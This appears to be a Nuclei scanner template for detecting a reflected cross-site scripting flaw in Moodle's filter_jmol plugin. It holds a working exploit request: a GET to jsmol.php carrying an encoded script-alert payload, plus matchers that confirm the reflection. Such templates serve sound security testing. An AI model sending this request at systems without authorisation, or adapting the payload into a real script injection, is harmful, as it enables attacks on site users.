id: moodle-filter-jmol-xss

info:
  name: Moodle filter_jmol - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: Cross-site scripting on Moodle.
  reference:
    - https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities/
  tags: moodle,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<script>alert('XSS')</script>"
        part: body

      - type: word
        part: header
        words:
          - "text/html"
